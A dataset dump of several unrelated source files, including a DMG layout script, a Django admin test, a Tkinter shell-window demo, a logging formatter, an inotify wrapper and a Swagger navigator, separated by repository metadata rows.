'gridSpacing': 100.0,
'gridOffsetY': 0.0,
'showItemInfo': False,
'labelOnBottom': True,
'backgroundType': 2,
'backgroundColorRed': 1.0
}
alias = Alias.from_bytes(icvp['backgroundImageAlias'])
alias.volume.name = package_name_ns
alias.volume.posix_path = '/Volumes/' + package_name_ns
alias.volume.disk_image_alias.target.filename = package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.carbon_path = 'Macintosh HD:Users:\x00bitcoinuser:\x00Documents:\x00bitcoin:\x00bitcoin:\x00' + package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.posix_path = 'Users/bitcoinuser/Documents/bitcoin/bitcoin/' + package_name_ns + '.temp.dmg'
alias.target.carbon_path = package_name_ns + ':.background:\x00background.tiff'
icvp['backgroundImageAlias'] = biplist.Data(alias.to_bytes())
ds['.']['icvp'] = icvp
ds['.']['vSrn'] = ('long', 1)
ds['Applications']['Iloc'] = (370, 156)
ds['STAKECUBE-Qt.app']['Iloc'] = (128, 156)
ds.flush()
ds.close()
| 61.866667
| 1,817
| 0.724407
|
373841d05368144873ea5e4e3477de4a98d10202
| 1,332
|
py
|
Python
|
app/core/tests/test_admin.py
|
shreeshailaya/rest-api-recipeapp
|
59e010c25fc7322d14f8028ed71ebdc3f5fc2329
|
[
"MIT"
] | null | null | null |
app/core/tests/test_admin.py
|
shreeshailaya/rest-api-recipeapp
|
59e010c25fc7322d14f8028ed71ebdc3f5fc2329
|
[
"MIT"
] | null | null | null |
app/core/tests/test_admin.py
|
shreeshailaya/rest-api-recipeapp
|
59e010c25fc7322d14f8028ed71ebdc3f5fc2329
|
[
"MIT"
] | null | null | null |
from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSireTests(TestCase):
def setUp(self):
self.client = Client()
self.admin_user = get_user_model().objects.create_superuser(
email="admin@mech2it.com",
password='password123'
)
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email="test@mech2it.com",
password="password123",
name="Test Uder Full Name"
)
def test_user_listed(self):
'''Test of /admin page'''
url = reverse('admin:core_user_changelist')
res = self.client.get(url)
self.assertContains(res, self.user.name)
self.assertContains(res, self.user.email)
def test_user_page_change(self):
''' check that the user edit page works '''
url = reverse('admin:core_user_change', args=[self.user.id])
''' /admin/core/user/id '''
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
def test_create_user(self):
'''Test that create suseer page works '''
url = reverse('admin:core_user_add')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
| 31.714286
| 68
| 0.629129
|
0b59daacbf4051881d3272dcd6e1bd7d7ba32503
| 3,403
|
py
|
Python
|
Demo/tkinter/guido/ShellWindow.py
|
AtjonTV/Python-1.4
|
2a80562c5a163490f444181cb75ca1b3089759ec
|
[
"Unlicense",
"TCL",
"DOC",
"AAL",
"X11"
] | null | null | null |
Demo/tkinter/guido/ShellWindow.py
|
AtjonTV/Python-1.4
|
2a80562c5a163490f444181cb75ca1b3089759ec
|
[
"Unlicense",
"TCL",
"DOC",
"AAL",
"X11"
] | null | null | null |
Demo/tkinter/guido/ShellWindow.py
|
AtjonTV/Python-1.4
|
2a80562c5a163490f444181cb75ca1b3089759ec
|
[
"Unlicense",
"TCL",
"DOC",
"AAL",
"X11"
] | null | null | null |
import os
import sys
import string
from Tkinter import *
from ScrolledText import ScrolledText
from Dialog import Dialog
import signal
BUFSIZE = 512
class ShellWindow(ScrolledText):
def __init__(self, master=None, shell=None, **cnf):
if not shell:
try:
shell = os.environ['SHELL']
except KeyError:
shell = '/bin/sh'
shell = shell + ' -i'
args = string.split(shell)
shell = args[0]
apply(ScrolledText.__init__, (self, master), cnf)
self.pos = '1.0'
self.bind('<Return>', self.inputhandler)
self.bind('<Control-c>', self.sigint)
self.bind('<Control-t>', self.sigterm)
self.bind('<Control-k>', self.sigkill)
self.bind('<Control-d>', self.sendeof)
self.pid, self.fromchild, self.tochild = spawn(shell, args)
self.tk.createfilehandler(self.fromchild, READABLE,
self.outputhandler)
def outputhandler(self, file, mask):
data = os.read(file, BUFSIZE)
if not data:
self.tk.deletefilehandler(file)
pid, sts = os.waitpid(self.pid, 0)
print 'pid', pid, 'status', sts
self.pid = None
detail = sts>>8
cause = sts & 0xff
if cause == 0:
msg = "exit status %d" % detail
else:
msg = "killed by signal %d" % (cause & 0x7f)
if cause & 0x80:
msg = msg + " -- core dumped"
Dialog(self.master,
text=msg,
title="Exit status",
bitmap='warning',
default=0,
strings=('OK',))
return
self.insert(END, data)
self.pos = self.index("end - 1 char")
self.yview_pickplace(END)
def inputhandler(self, *args):
if not self.pid:
self.no_process()
return "break"
self.insert(END, "\n")
line = self.get(self.pos, "end - 1 char")
self.pos = self.index(END)
os.write(self.tochild, line)
return "break"
def sendeof(self, *args):
if not self.pid:
self.no_process()
return "break"
os.close(self.tochild)
return "break"
def sendsig(self, sig):
if not self.pid:
self.no_process()
return "break"
os.kill(self.pid, sig)
return "break"
def sigint(self, *args):
return self.sendsig(signal.SIGINT)
def sigquit(self, *args):
return self.sendsig(signal.SIGQUIT)
def sigterm(self, *args):
return self.sendsig(signal.SIGTERM)
def sigkill(self, *args):
return self.sendsig(signal.SIGKILL)
def no_process(self):
Dialog(self.master,
text="No active process",
title="No process",
bitmap='error',
default=0,
strings=('OK',))
MAXFD = 100 # Max number of file descriptors (os.getdtablesize()???)
def spawn(prog, args):
p2cread, p2cwrite = os.pipe()
c2pread, c2pwrite = os.pipe()
pid = os.fork()
if pid == 0:
# Child
os.close(0)
os.close(1)
os.close(2)
if os.dup(p2cread) <> 0:
sys.stderr.write('popen2: bad read dup\n')
if os.dup(c2pwrite) <> 1:
sys.stderr.write('popen2: bad write dup\n')
if os.dup(c2pwrite) <> 2:
sys.stderr.write('popen2: bad write dup\n')
for i in range(3, MAXFD):
try:
os.close(i)
except:
pass
try:
os.execvp(prog, args)
finally:
sys.stderr.write('execvp failed\n')
os._exit(1)
os.close(p2cread)
os.close(c2pwrite)
return pid, c2pread, p2cwrite
def test():
shell = string.join(sys.argv[1:])
root = Tk()
root.minsize(1, 1)
if shell:
w = ShellWindow(root, shell=shell)
else:
w = ShellWindow(root)
w.pack(expand=1, fill=BOTH)
w.focus_set()
w.tk.mainloop()
if __name__ == '__main__':
test()
| 22.686667
| 68
| 0.637967
|
33089e03375406a6c23f7aa1f559431c0065f4d1
| 4,727
|
py
|
Python
|
vcspull/log.py
|
Segaja/vcspull
|
6d4fe5e02870696e47923830548ad1c9f8edb4ab
|
[
"MIT"
] | null | null | null |
vcspull/log.py
|
Segaja/vcspull
|
6d4fe5e02870696e47923830548ad1c9f8edb4ab
|
[
"MIT"
] | 1
|
2022-03-22T02:08:49.000Z
|
2022-03-22T02:08:49.000Z
|
vcspull/log.py
|
Segaja/vcspull
|
6d4fe5e02870696e47923830548ad1c9f8edb4ab
|
[
"MIT"
] | null | null | null |
"""Log utilities for formatting CLI output.
vcspull.log
~~~~~~~~~~~
This module containers special formatters for processing the additional context
information from :class:`libvcs.base.RepoLoggingAdapter`.
Colorized formatters for generic logging inside the application is also
provided.
"""
import logging
import time
from colorama import Fore, Style
LEVEL_COLORS = {
"DEBUG": Fore.BLUE, # Blue
"INFO": Fore.GREEN, # Green
"WARNING": Fore.YELLOW,
"ERROR": Fore.RED,
"CRITICAL": Fore.RED,
}
def setup_logger(log=None, level="INFO"):
"""Setup logging for CLI use.
Parameters
----------
log : :py:class:`Logger`
instance of logger
"""
if not log:
log = logging.getLogger()
if not log.handlers:
channel = logging.StreamHandler()
channel.setFormatter(DebugLogFormatter())
log.setLevel(level)
log.addHandler(channel)
# setup styling for repo loggers
repo_logger = logging.getLogger("libvcs")
channel = logging.StreamHandler()
channel.setFormatter(RepoLogFormatter())
channel.addFilter(RepoFilter())
repo_logger.setLevel(level)
repo_logger.addHandler(channel)
def default_log_template(self, record):
"""Return the prefix for the log message. Template for Formatter.
Parameters
----------
record : :py:class:`logging.LogRecord`
This is passed in from inside the :py:meth:`logging.Formatter.format` record.
"""
reset = [Style.RESET_ALL]
levelname = [
LEVEL_COLORS.get(record.levelname),
Style.BRIGHT,
"(%(levelname)s)",
Style.RESET_ALL,
" ",
]
asctime = [
"[",
Fore.BLACK,
Style.DIM,
Style.BRIGHT,
"%(asctime)s",
Fore.RESET,
Style.RESET_ALL,
"]",
]
name = [
" ",
Fore.WHITE,
Style.DIM,
Style.BRIGHT,
"%(name)s",
Fore.RESET,
Style.RESET_ALL,
" ",
]
tpl = "".join(reset + levelname + asctime + name + reset)
return tpl
class LogFormatter(logging.Formatter):
template = default_log_template
def __init__(self, color=True, *args, **kwargs):
logging.Formatter.__init__(self, *args, **kwargs)
def format(self, record):
try:
record.message = record.getMessage()
except Exception as e:
record.message = f"Bad message ({e!r}): {record.__dict__!r}"
date_format = "%H:%m:%S"
record.asctime = time.strftime(date_format, self.converter(record.created))
prefix = self.template(record) % record.__dict__
formatted = prefix + " " + record.message
return formatted.replace("\n", "\n ")
def debug_log_template(self, record):
"""Return the prefix for the log message. Template for Formatter.
Parameters
----------
record : :class:`logging.LogRecord`
This is passed in from inside the :py:meth:`logging.Formatter.format` record.
"""
reset = [Style.RESET_ALL]
levelname = [
LEVEL_COLORS.get(record.levelname),
Style.BRIGHT,
"(%(levelname)1.1s)",
Style.RESET_ALL,
" ",
]
asctime = [
"[",
Fore.BLACK,
Style.DIM,
Style.BRIGHT,
"%(asctime)s",
Fore.RESET,
Style.RESET_ALL,
"]",
]
name = [
" ",
Fore.WHITE,
Style.DIM,
Style.BRIGHT,
"%(name)s",
Fore.RESET,
Style.RESET_ALL,
" ",
]
module_funcName = [Fore.GREEN, Style.BRIGHT, "%(module)s.%(funcName)s()"]
lineno = [
Fore.BLACK,
Style.DIM,
Style.BRIGHT,
":",
Style.RESET_ALL,
Fore.CYAN,
"%(lineno)d",
]
tpl = "".join(reset + levelname + asctime + name + module_funcName + lineno + reset)
return tpl
class DebugLogFormatter(LogFormatter):
"""Provides greater technical details than standard log Formatter."""
template = debug_log_template
class RepoLogFormatter(LogFormatter):
def template(self, record):
record.message = "".join(
[Fore.MAGENTA, Style.BRIGHT, record.message, Fore.RESET, Style.RESET_ALL]
)
return "{}|{}| {}({}) {}".format(
Fore.GREEN + Style.DIM,
record.repo_name,
Fore.YELLOW,
record.repo_vcs,
Fore.RESET,
)
class RepoFilter(logging.Filter):
"""Only include repo logs for this type of record."""
def filter(self, record):
"""Only return a record if a repo_vcs object."""
return True if "repo_vcs" in record.__dict__ else False
| 23.873737
| 88
| 0.578168
|
c320d1bb36a3b6d152d967b00ed3ba4011d2627d
| 3,987
|
py
|
Python
|
gameplay/behaviours/cameraBehaviour.py
|
WilliamDASILVA/TheMysteryOfSchweitzer
|
f81edc2e202bd5009fc96ccfbbfcc40bc135a17a
|
[
"MIT"
] | null | null | null |
gameplay/behaviours/cameraBehaviour.py
|
WilliamDASILVA/TheMysteryOfSchweitzer
|
f81edc2e202bd5009fc96ccfbbfcc40bc135a17a
|
[
"MIT"
] | null | null | null |
gameplay/behaviours/cameraBehaviour.py
|
WilliamDASILVA/TheMysteryOfSchweitzer
|
f81edc2e202bd5009fc96ccfbbfcc40bc135a17a
|
[
"MIT"
] | null | null | null |
from engine import Global;
from random import randint;
from engine import Update;
# --------------------------------------------------- *\
# Camera behaviour
# --------------------------------------------------- */
cameraToUse = None;
shakeIntensity = 0;
isCameraShaking = False;
isCameraFixed = False;
fixeTarget = None;
usedScene = None;
# --------------------------------------------------- *\
# [function] setCameraFixedTo(targetScene)
#
# * Fix the camera mouvement on the scene *
# Return : nil
# --------------------------------------------------- */
def setCameraFixedTo(targetScene):
global isCameraFixed;
global fixeTarget;
isCameraFixed = True;
fixeTarget = targetScene;
# --------------------------------------------------- *\
# [function] setScene(scene)
#
# * Specify a scene for the camera behaviour *
# Return : nil
# --------------------------------------------------- */
def setScene(scene):
global usedScene;
usedScene = scene;
# --------------------------------------------------- *\
# [function] setCamera(camera)
#
# * Set the camera to use in the behaviour *
# Return : nil
# --------------------------------------------------- */
def setCamera(camera):
global cameraToUse;
cameraToUse = camera;
# --------------------------------------------------- *\
# [function] getCamera()
#
# * Return the camera element *
# Return : camera
# --------------------------------------------------- */
def getCamera():
return cameraToUse;
savedPositionBeforeShaking = [0,0];
# --------------------------------------------------- *\
# [function] shakeCamera(intensity, time)
#
# * Shake the camera for a certain amount of time *
# Return : nil
# --------------------------------------------------- */
def shakeCamera(intensity, time):
global isCameraShaking;
global shakeIntensity;
global savedPositionBeforeShaking;
if not isCameraShaking:
isCameraShaking = True;
shakeIntensity = intensity;
camPosition = cameraToUse.getPosition();
savedPositionBeforeShaking = [camPosition[0], camPosition[1]];
Global.setInterval(camRandomPosition, 100/intensity);
Global.setTimeout(stopShaking, time);
# --------------------------------------------------- *\
# [function] camRandomPosition()
#
# * Set the camera to a random position according to the intensity *
# Return : nil
# --------------------------------------------------- */
def camRandomPosition():
if isCameraShaking:
randPosition = [randint(-5*shakeIntensity, 5*shakeIntensity), randint(-5*shakeIntensity, 5*shakeIntensity)];
cameraToUse.setPosition(savedPositionBeforeShaking[0] + randPosition[0], savedPositionBeforeShaking[1] +randPosition[1]);
# --------------------------------------------------- *\
# [function] stopShaking()
#
# * Stop the shaking *
# Return : nil
# --------------------------------------------------- */
def stopShaking():
global isCameraShaking;
isCameraShaking = False;
cameraToUse.setPosition(savedPositionBeforeShaking[0], savedPositionBeforeShaking[1]);
# --------------------------------------------------- *\
# [function] onUpdate()
#
# * Camera behaviour on each frame *
# Return : nil
# --------------------------------------------------- */
appendToElement = True;
def cameraUpdate():
global appendToElement;
position = cameraToUse.getPosition();
sX = Global.screenSize[0];
sY = Global.screenSize[1];
scale = Global.scale;
if isCameraFixed and isCameraShaking == False:
if fixeTarget != None:
targetPosition = fixeTarget.getPosition();
if appendToElement:
targetSize = fixeTarget.getSize();
cameraToUse.setPosition((targetPosition[0] + (targetSize[0] / 2)) *scale, (targetPosition[1] + (targetSize[1] / 4)) *scale);
# check for scene boudaries
if usedScene:
sceneSize = usedScene.getSize();
if(targetPosition[0]*scale <= sX/2) or (targetPosition[0] *scale >= sceneSize[0] * scale - (sX/2)):
appendToElement = False;
else:
appendToElement = True;
Update.on(cameraUpdate);
| 30.435115
| 128
| 0.543266
|
ecb484ab629a6a8bf2280d7aac82aac0bffdd2f8
| 15,222
|
py
|
Python
|
lib/python/treadmill/syscall/inotify.py
|
bretttegart/treadmill
|
812109e31c503a6eddaee2d3f2e1faf2833b6aaf
|
[
"Apache-2.0"
] | 2
|
2017-10-31T18:48:20.000Z
|
2018-03-04T20:35:20.000Z
|
lib/python/treadmill/syscall/inotify.py
|
bretttegart/treadmill
|
812109e31c503a6eddaee2d3f2e1faf2833b6aaf
|
[
"Apache-2.0"
] | null | null | null |
lib/python/treadmill/syscall/inotify.py
|
bretttegart/treadmill
|
812109e31c503a6eddaee2d3f2e1faf2833b6aaf
|
[
"Apache-2.0"
] | null | null | null |
"""Linux inotify(7) API wrapper module.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
import logging
import operator
import os
import struct
import ctypes
from ctypes import (
c_int,
c_char_p,
c_uint32,
)
from ctypes.util import find_library
import enum
import six
_LOGGER = logging.getLogger(__name__)
###############################################################################
# Map the C interface
_LIBC_PATH = find_library('c')
_LIBC = ctypes.CDLL(_LIBC_PATH, use_errno=True)
if any([getattr(_LIBC, func_name, None) is None
for func_name in ['inotify_init1',
'inotify_add_watch',
'inotify_rm_watch']]):
raise ImportError('Unsupported libc version found: %s' % _LIBC_PATH)
###############################################################################
# int inotify_init(void);
_INOTIFY_INIT1_DECL = ctypes.CFUNCTYPE(c_int, c_int, use_errno=True)
_INOTIFY_INIT1 = _INOTIFY_INIT1_DECL(('inotify_init1', _LIBC))
def inotify_init(flags=0):
"""Initializes a new inotify instance and returns a file descriptor
associated with a new inotify event queue.
:param ``INInitFlags`` flags:
Optional flag to control the inotify_init behavior.
"""
fileno = _INOTIFY_INIT1(flags)
if fileno < 0:
errno = ctypes.get_errno()
raise OSError(errno, os.strerror(errno),
'inotify_init1(%r)' % flags)
return fileno
###############################################################################
# Constants copied from sys/inotify.h
#
# See man inotify(7) for more details.
#
class INInitFlags(enum.IntEnum):
"""Flags supported by inotify_init(2).
"""
NONBLOCK = 0o4000
CLOEXEC = 0o2000000
#: Set the O_NONBLOCK file status flag on the new open file description. Using
#: this flag saves extra calls to fcntl(2) to achieve the same result.
#: (since Linux 2.6.27)
IN_NONBLOCK = INInitFlags.NONBLOCK
#: Set the close-on-exec (FD_CLOEXEC) flag on the new file descriptor. See the
#: description of the O_CLOEXEC flag in open(2) for reasons why this may be
#: useful.
#: (since Linux 2.6.27)
IN_CLOEXEC = INInitFlags.CLOEXEC
###############################################################################
# int inotify_add_watch(int fileno, const char *pathname, uint32_t mask);
_INOTIFY_ADD_WATCH_DECL = ctypes.CFUNCTYPE(c_int, c_int, c_char_p, c_uint32,
use_errno=True)
_INOTIFY_ADD_WATCH = _INOTIFY_ADD_WATCH_DECL(('inotify_add_watch', _LIBC))
def inotify_add_watch(fileno, path, mask):
"""Add a watch to an initialized inotify instance.
:params ``int`` fileno:
Inotify socket.
:params ``str`` path:
Path to add the watch on.
:params ``int`` mask:
Mask of :class:`INAddWatchFlags` values controlling the watch creation.
:returns:
``int`` - Corresponding watch ID.
"""
encoded_path = path.encode()
watch_id = _INOTIFY_ADD_WATCH(fileno, encoded_path, mask)
if watch_id < 0:
errno = ctypes.get_errno()
raise OSError(errno, os.strerror(errno),
'inotify_add_watch(%r, %r, %r)' % (fileno, path, mask))
return watch_id
###############################################################################
# Constants copied from sys/inotify.h
#
# See man inotify(7) for more details.
#
class INAddWatchFlags(enum.IntEnum):
"""Special flags for inotify_add_watch.
"""
#: Do not follow a symbolic link.
DONT_FOLLOW = 0x02000000
#: Add to the mask of an existing watch.
MASK_ADD = 0x20000000
#: Only send event once.
ONESHOT = 0x80000000
#: Only watch the path if it's a directory.
ONLYDIR = 0x01000000
#: Don't dereference pathname if it is a symbolic link.
#: (since Linux 2.6.15)
IN_DONT_FOLLOW = INAddWatchFlags.DONT_FOLLOW
#: Add (OR) events to watch mask for this pathname if it already exists
#: (instead of replacing mask).
IN_MASK_ADD = INAddWatchFlags.MASK_ADD
#: Monitor pathname for one event, then remove from watch list.
IN_ONESHOT = INAddWatchFlags.ONESHOT
#: Only watch pathname if it's a directory.
#: (since Linux 2.6.15)
IN_ONLYDIR = INAddWatchFlags.ONLYDIR
###############################################################################
# int inotify_rm_watch(int fileno, uint32_t wd);
_INOTIFY_RM_WATCH_DECL = ctypes.CFUNCTYPE(c_int, c_int, c_uint32,
use_errno=True)
_INOTIFY_RM_WATCH = _INOTIFY_RM_WATCH_DECL(('inotify_rm_watch', _LIBC))
def inotify_rm_watch(fileno, watch_id):
"""Remove an existing watch from an inotify instance.
:params ``int`` fileno:
Inotify socket.
:params ``int`` watch_id:
Watch ID to remove.
"""
res = _INOTIFY_RM_WATCH(fileno, watch_id)
if res < 0:
errno = ctypes.get_errno()
raise OSError(errno, os.strerror(errno),
'inotify_rm_watch(%r, %r)' % (fileno, watch_id))
INOTIFY_EVENT_HDRSIZE = struct.calcsize('iIII')
###############################################################################
def _parse_buffer(event_buffer):
"""Parses an inotify event buffer of ``inotify_event`` structs read from
the inotify socket.
The inotify_event structure looks like this::
struct inotify_event {
__s32 wd; /* watch descriptor */
__u32 mask; /* watch mask */
__u32 cookie; /* cookie to synchronize two events */
__u32 len; /* length (including nulls) of name */
char name[0]; /* stub for possible name */
};
The ``cookie`` member of this struct is used to pair two related
events, for example, it pairs an IN_MOVED_FROM event with an
IN_MOVED_TO event.
"""
while len(event_buffer) >= INOTIFY_EVENT_HDRSIZE:
wd, mask, cookie, length = struct.unpack_from('iIII', event_buffer, 0)
name = event_buffer[
INOTIFY_EVENT_HDRSIZE:
INOTIFY_EVENT_HDRSIZE + length
]
name = name.rstrip(b'\x00')
event_buffer = event_buffer[INOTIFY_EVENT_HDRSIZE + length:]
yield wd, mask, cookie, name
assert not event_buffer, 'Unparsed bytes left in buffer: %r' % event_buffer
###############################################################################
# Constants copied from sys/inotify.h
#
# See man inotify(7) for more details.
#
# Constants related to inotify. See man inotify(7) and sys/inotify.h
class INEvent(enum.IntEnum):
"""Inotify events.
"""
# Events triggered by user-space
ACCESS = 0x00000001
ATTRIB = 0x00000004
CLOSE_WRITE = 0x00000008
CLOSE_NOWRITE = 0x00000010
CREATE = 0x00000100
DELETE = 0x00000200
DELETE_SELF = 0x00000400
MODIFY = 0x00000002
MOVE_SELF = 0x00000800
MOVED_FROM = 0x00000040
MOVED_TO = 0x00000080
OPEN = 0x00000020
# Events sent by the kernel
IGNORED = 0x00008000
ISDIR = 0x40000000
Q_OVERFLOW = 0x00004000
UNMOUNT = 0x00002000
#: File was accessed (read).
IN_ACCESS = INEvent.ACCESS
#: Metadata changed, e.g. permissions, timestamps, extended attributes, link
#: count (since Linux 2.6.25), UID, GID, etc.
IN_ATTRIB = INEvent.ATTRIB
#: File opened for writing was closed.
IN_CLOSE_WRITE = INEvent.CLOSE_WRITE
#: File not opened for writing was closed.
IN_CLOSE_NOWRITE = INEvent.CLOSE_NOWRITE
#: File/directory created in watched directory.
IN_CREATE = INEvent.CREATE
#: File/directory deleted from watched directory.
IN_DELETE = INEvent.DELETE
#: Watched file/directory was itself deleted.
IN_DELETE_SELF = INEvent.DELETE_SELF
#: File was modified.
IN_MODIFY = INEvent.MODIFY
#: Watched file/directory was itself moved.
IN_MOVE_SELF = INEvent.MOVE_SELF
#: File moved out of watched directory.
IN_MOVED_FROM = INEvent.MOVED_FROM
#: File moved into watched directory.
IN_MOVED_TO = INEvent.MOVED_TO
#: File was opened.
IN_OPEN = INEvent.OPEN
#: Watch was removed explicitly (inotify_rm_watch(2)) or automatically (file
#: was deleted, or file system was unmounted).
IN_IGNORED = INEvent.IGNORED
#: Subject of this event is a directory.
IN_ISDIR = INEvent.ISDIR
#: Event queue overflowed (wd is -1 for this event).
IN_Q_OVERFLOW = INEvent.Q_OVERFLOW
#: File system containing watched object was unmounted.
IN_UNMOUNT = INEvent.UNMOUNT
# Helper values for user-space events
IN_CLOSE = IN_CLOSE_WRITE | IN_CLOSE_NOWRITE
IN_MOVE = IN_MOVED_FROM | IN_MOVED_TO
# All user-space events.
IN_ALL_EVENTS = six.moves.reduce(operator.or_, [
IN_ACCESS,
IN_ATTRIB,
IN_CLOSE_NOWRITE,
IN_CLOSE_WRITE,
IN_CREATE,
IN_DELETE,
IN_DELETE_SELF,
IN_MODIFY,
IN_MOVED_FROM,
IN_MOVED_TO,
IN_MOVE_SELF,
IN_OPEN,
])
def _fmt_mask(mask):
"""Parse an Inotify event mask into indivitual event flags."""
masks = []
# Non-iterable value INEvent is used in an iterating context
for event in INEvent:
if mask & event:
masks.append(event.name)
mask ^= event
if mask:
masks.append(hex(mask))
return masks
###############################################################################
# High level Python API
class InotifyEvent(collections.namedtuple('InotifyEvent',
'wd mask cookie src_path')):
"""
Inotify event struct wrapper.
:param wd:
Watch descriptor
:param mask:
Event mask
:param cookie:
Event cookie
:param src_path:
Event source path
"""
__slots__ = ()
@property
def is_modify(self):
"""Test mask shorthand."""
return bool(self.mask & IN_MODIFY)
@property
def is_close_write(self):
"""Test mask shorthand."""
return bool(self.mask & IN_CLOSE_WRITE)
@property
def is_close_nowrite(self):
"""Test mask shorthand."""
return bool(self.mask & IN_CLOSE_NOWRITE)
@property
def is_access(self):
"""Test mask shorthand."""
return bool(self.mask & IN_ACCESS)
@property
def is_delete(self):
"""Test mask shorthand."""
return bool(self.mask & IN_DELETE)
@property
def is_delete_self(self):
"""Test mask shorthand."""
return bool(self.mask & IN_DELETE_SELF)
@property
def is_create(self):
"""Test mask shorthand."""
return bool(self.mask & IN_CREATE)
@property
def is_moved_from(self):
"""Test mask shorthand."""
return bool(self.mask & IN_MOVED_FROM)
@property
def is_moved_to(self):
"""Test mask shorthand."""
return bool(self.mask & IN_MOVED_TO)
@property
def is_move(self):
"""Test mask shorthand."""
return bool(self.mask & IN_MOVE)
@property
def is_move_self(self):
"""Test mask shorthand."""
return bool(self.mask & IN_MOVE_SELF)
@property
def is_attrib(self):
"""Test mask shorthand."""
return bool(self.mask & IN_ATTRIB)
@property
def is_ignored(self):
"""Test mask shorthand."""
return bool(self.mask & IN_IGNORED)
@property
def is_directory(self):
"""Test mask shorthand."""
return bool(self.mask & IN_ISDIR)
def __repr__(self):
masks = _fmt_mask(self.mask)
return ('<InotifyEvent: src_path=%s, wd=%d, mask=%s, cookie=%d>') % (
self.src_path,
self.wd,
'|'.join(masks),
self.cookie,
)
DEFAULT_NUM_EVENTS = 2048
DEFAULT_EVENT_BUFFER_SIZE = DEFAULT_NUM_EVENTS * INOTIFY_EVENT_HDRSIZE
class Inotify(object):
"""Inotify system interface."""
def __init__(self, flags):
"""Initialize a new Inotify object.
"""
# The file descriptor associated with the inotify instance.
inotify_fd = inotify_init(flags)
self._inotify_fd = inotify_fd
self._paths = {}
def fileno(self):
"""The file descriptor associated with the inotify instance."""
return self._inotify_fd
def close(self):
"""Close the inotify filedescriptor.
NOTE: After call this, this object will be unusable.
"""
os.close(self._inotify_fd)
def add_watch(self, path, event_mask=IN_ALL_EVENTS):
"""
Adds a watch for the given path to monitor events specified by the
mask.
:param path:
Path to monitor
:type path:
``str``
:param event_mask:
*optional* Bit mask of the request events.
:type event_mask:
``int``
:returns:
Unique watch descriptor identifier
:rtype:
``int``
"""
path = os.path.normpath(path)
watch_id = inotify_add_watch(
self._inotify_fd,
path,
event_mask | IN_MASK_ADD
)
self._paths[watch_id] = path
return watch_id
def remove_watch(self, watch_id):
"""
Removes a watch.
:param watch_id:
Watch descriptor returned by :meth:`~Inotify.add_watch`
:type watch_id:
``int``
:returns:
``None``
"""
inotify_rm_watch(self._inotify_fd, watch_id)
def read_events(self, event_buffer_size=DEFAULT_EVENT_BUFFER_SIZE):
"""
Reads events from inotify and yields them.
:param event_buffer_size:
*optional* Buffer size while reading the inotify socket
:type event_buffer_size:
``int``
:returns:
List of :class:`InotifyEvent` instances
:rtype:
``list``
"""
if not self._paths:
return []
event_buffer = os.read(self._inotify_fd, event_buffer_size)
event_list = []
for wd, mask, cookie, name in _parse_buffer(event_buffer):
name = name.decode()
wd_path = self._paths[wd]
src_path = os.path.normpath(os.path.join(wd_path, name))
inotify_event = InotifyEvent(wd, mask, cookie, src_path)
_LOGGER.debug('Received event %r', inotify_event)
if inotify_event.mask & IN_IGNORED:
# Clean up deleted watches
del self._paths[wd]
event_list.append(inotify_event)
return event_list
###############################################################################
__all__ = [
'IN_NONBLOCK',
'IN_NONBLOCK',
'IN_DONT_FOLLOW',
'IN_MASK_ADD',
'IN_ONESHOT',
'IN_ONLYDIR',
'IN_ACCESS',
'IN_ATTRIB',
'IN_CLOSE_WRITE',
'IN_CLOSE_NOWRITE',
'IN_CREATE',
'IN_DELETE',
'IN_DELETE_SELF',
'IN_MODIFY',
'IN_MOVE_SELF',
'IN_MOVED_FROM',
'IN_MOVED_TO',
'IN_OPEN',
'IN_IGNORED',
'IN_ISDIR',
'IN_Q_OVERFLOW',
'IN_UNMOUNT',
'IN_CLOSE',
'IN_MOVE',
'IN_ALL_EVENTS',
'inotify_init',
'inotify_add_watch',
'inotify_rm_watch',
'Inotify',
'InotifyEvent',
]
| 28.188889
| 79
| 0.606228
|
787f1215bcb5d82f82b0c3eb2245c4b706cdb670
| 8,697
|
py
|
Python
|
dev/Gems/CloudGemFramework/v1/AWS/resource-manager-code/swagger_json_navigator.py
|
stickyparticles/lumberyard
|
dc523dd780f3cd1874251181b7cf6848b8db9959
|
[
"AML"
] | 2
|
2019-11-29T09:04:54.000Z
|
2021-03-18T02:34:44.000Z
|
dev/Gems/CloudGemFramework/v1/AWS/resource-manager-code/swagger_json_navigator.py
|
JulianoCristian/Lumberyard-3
|
dc523dd780f3cd1874251181b7cf6848b8db9959
|
[
"AML"
] | null | null | null |
dev/Gems/CloudGemFramework/v1/AWS/resource-manager-code/swagger_json_navigator.py
|
JulianoCristian/Lumberyard-3
|
dc523dd780f3cd1874251181b7cf6848b8db9959
|
[
"AML"
] | 3
|
2019-05-13T09:41:33.000Z
|
2021-04-09T12:12:38.000Z
|
#
# All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
# its licensors.
#
# For complete copyright and license terms please see the LICENSE at the root of this
# distribution (the "License"). All use of this software is governed by the License,
# or, if provided, by the license below or the license accompanying this file. Do not
# remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
REQUIRED = {} # special value used when no default is acceptable
class SwaggerNavigator(object):
def __init__(self, value, parent = None, selector=None):
self.value = value
self.parent = parent
self.selector = selector
def __repr__(self):
if not self.parent:
return "swagger.json:"
return self.parent.__repr__() + "[{}]".format(self.formatted_selector)
@property
def root(self):
if self.parent:
return self.parent.root
else:
return self
@property
def formatted_selector(self):
if isinstance(self.selector, str):
return "\"{}\"".format(self.selector)
return self.selector
def contains(self, value):
if self.is_object or self.is_array:
return value in self.value
else:
raise ValueError('{} is not an object or array.'.format(self))
def get(self, selector, default=REQUIRED):
if self.is_object:
if selector not in self.value:
if default is REQUIRED:
raise ValueError('{} has no {} property.'.format(self, selector))
else:
found_value = default
else:
found_value = self.value[selector]
return SwaggerNavigator(found_value, parent=self, selector = selector)
elif self.is_array:
if not isinstance(selector, int):
raise ValueError('{} is a list but accessor {} is not an integer.'.format(self, selector))
if selector < 0 or selector >= len(self.value):
if default is REQUIRED:
raise ValueError('{} has no index {}.'.format(self, selector))
else:
found_value = default
else:
found_value = self.value[selector]
